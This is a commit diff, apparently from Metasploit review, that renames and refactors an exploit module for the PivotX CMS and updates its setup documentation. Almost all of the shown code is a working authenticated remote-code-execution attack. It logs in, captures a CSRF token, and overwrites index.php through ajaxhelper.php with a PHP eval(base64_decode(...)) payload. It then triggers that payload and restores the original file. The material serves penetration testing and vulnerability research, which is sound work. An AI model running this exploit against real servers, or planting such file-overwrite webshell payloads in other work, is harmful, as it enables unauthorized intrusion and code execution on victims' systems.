Addressing comments

Author: msutovsky-r7

documentation/modules/exploit/linux/http/pivotx_rce.md renamed to documentation/modules/exploit/linux/http/pivotx_index_php_overwrite.md

@@ -8,6 +8,7 @@ Install steps:
 1. Install Apache2, MySQL, PHP8.2+
 1. `git clone https://github.com/pivotx/PivotX.git`
 1. Move `PivotX` to webfolder
+1. Run the following from the web folder `sudo chown -R www-data:www-data ./`
 
 ## Verification Steps
 

modules/exploits/linux/http/pivotx_rce.rb renamed to modules/exploits/linux/http/pivotx_index_php_overwrite.rb

@@ -6,8 +6,8 @@
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking # https://docs.metasploit.com/docs/using-metasploit/intermediate/exploit-ranking.html
 
-  include Exploit::Remote::Tcp
   include Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
     super(
@@ -56,62 +56,59 @@ def initialize(info = {})
   def check
     res = send_request_cgi({
       'method' => 'GET',
-      'uri' => normalize_uri(datastore['TARGETURI'], 'pivotx', 'index.php')
+      'uri' => normalize_uri(target_uri.path, 'pivotx', 'index.php')
     })
 
-    return Exploit::CheckCode::Unknown, 'Unexpected response' unless res&.code == 200
+    return Msf::Exploit::CheckCode::Unknown('Unexpected response') unless res&.code == 200
 
-    return Exploit::CheckCode::Safe, 'Target is not PivotX' unless res.body.include?('PivotX Powered')
+    return Msf::Exploit::CheckCode::Safe('Target is not PivotX') unless res.body.include?('PivotX Powered')
 
     html_body = res.get_html_document
 
-    return Exploit::CheckCode::Unknown, 'Could not find version element' unless html_body.search('em').find { |i| i.text =~ /PivotX - (\d.\d\d?.\d\d?-[a-z0-9]+)/ }
+    return Msf::Exploit::CheckCode::Unknown('Could not find version element') unless html_body.search('em').find { |i| i.text =~ /PivotX - (\d.\d\d?.\d\d?-[a-z0-9]+)/ }
 
     version = Rex::Version.new(Regexp.last_match(1))
 
-    return Exploit::CheckCode::Appears, "Detected PivotX  #{version}" if version <= Rex::Version.new('3.0.0-rc3')
+    return Msf::Exploit::CheckCode::Appears("Detected PivotX  #{version}") if version <= Rex::Version.new('3.0.0-rc3')
 
-    return Exploit::CheckCode::Safe, "PivotX  #{version} is not vulnerable"
+    return Msf::Exploit::CheckCode::Safe("PivotX  #{version} is not vulnerable")
   end
 
   def login
     boundary = Rex::Text.rand_text_alphanumeric(16).to_s
-    data_post = "------WebKitFormBoundary#{boundary}\r\n"
 
+    data_post = "------WebKitFormBoundary#{boundary}\r\n"
     data_post << "Content-Disposition: form-data; name=\"returnto\"\r\n\r\n"
     data_post << "\r\n"
     data_post << "------WebKitFormBoundary#{boundary}\r\n"
-
     data_post << "Content-Disposition: form-data; name=\"template\"\r\n\r\n"
     data_post << "\r\n"
     data_post << "------WebKitFormBoundary#{boundary}\r\n"
-
     data_post << "Content-Disposition: form-data; name=\"username\"\r\n\r\n"
     data_post << "#{datastore['USERNAME']}\r\n"
     data_post << "------WebKitFormBoundary#{boundary}\r\n"
-
     data_post << "Content-Disposition: form-data; name=\"password\"\r\n\r\n"
     data_post << "#{datastore['PASSWORD']}\r\n"
     data_post << "------WebKitFormBoundary#{boundary}\r\n"
 
-    res = send_request_cgi({
+    res = send_request_cgi!({
       'method' => 'POST',
-      'uri' => normalize_uri(datastore['TARGETURI'], 'pivotx', 'index.php'),
+      'uri' => normalize_uri(target_uri.path, 'pivotx', 'index.php'),
       'vars_get' => { 'page' => 'login' },
       'ctype' => "multipart/form-data; boundary=----WebKitFormBoundary#{boundary}",
       'data' => data_post,
       'keep_cookies' => true
     })
 
-    fail_with Failure::NoAccess, 'Login failed, probably incorrect credentials' unless res&.code == 200 && res.body.include?('Dashboard') && res.get_cookies =~ /pivotxsession=([a-zA-Z0-9]+);/
+    fail_with Failure::NoAccess, 'Login failed, probably incorrect credentials' unless res&.code == 200 && res.body.include?('Dashboard') && !res.body.include?('Incorrect username/password') && res.get_cookies =~ /pivotxsession=([a-zA-Z0-9]+);/
 
     @csrf_token = Regexp.last_match(1)
   end
 
   def modify_file
     res = send_request_cgi({
       'method' => 'GET',
-      'uri' => normalize_uri(datastore['TARGETURI'], 'pivotx', 'index.php'),
+      'uri' => normalize_uri(target_uri.path, 'pivotx', 'index.php'),
       'vars_get' => { 'page' => 'homeexplore' }
     })
 
@@ -121,7 +118,7 @@ def modify_file
 
     res = send_request_cgi({
       'method' => 'GET',
-      'uri' => normalize_uri(datastore['TARGETURI'], 'pivotx', 'ajaxhelper.php'),
+      'uri' => normalize_uri(target_uri.path, 'pivotx', 'ajaxhelper.php'),
       'vars_get' => { 'function' => 'view', 'basedir' => @base_dir, 'file' => 'index.php' }
     })
 
@@ -133,7 +130,7 @@ def modify_file
 
     res = send_request_cgi({
       'method' => 'POST',
-      'uri' => normalize_uri(datastore['TARGETURI'], 'pivotx', 'ajaxhelper.php'),
+      'uri' => normalize_uri(target_uri.path, 'pivotx', 'ajaxhelper.php'),
       'vars_post' => { 'csrfcheck' => @csrf_token, 'function' => 'save', 'basedir' => @base_dir, 'file' => 'index.php', 'contents' => "<?php eval(base64_decode('#{Base64.strict_encode64(payload.encoded)}')); ?> #{@original_value}" }
     })
 
@@ -143,14 +140,14 @@ def modify_file
   def trigger_payload
     send_request_cgi({
       'method' => 'POST',
-      'uri' => normalize_uri(datastore['TARGETURI'], 'index.php')
+      'uri' => normalize_uri(target_uri.path, 'index.php')
     })
   end
 
   def restore
     res = send_request_cgi({
       'method' => 'POST',
-      'uri' => normalize_uri(datastore['TARGETURI'], 'pivotx', 'ajaxhelper.php'),
+      'uri' => normalize_uri(target_uri.path, 'pivotx', 'ajaxhelper.php'),
       'vars_post' => { 'csrfcheck' => @csrf_token, 'function' => 'save', 'basedir' => @base_dir, 'file' => 'index.php', 'contents' => @original_value }
     })
     vprint_status('Restoring original content')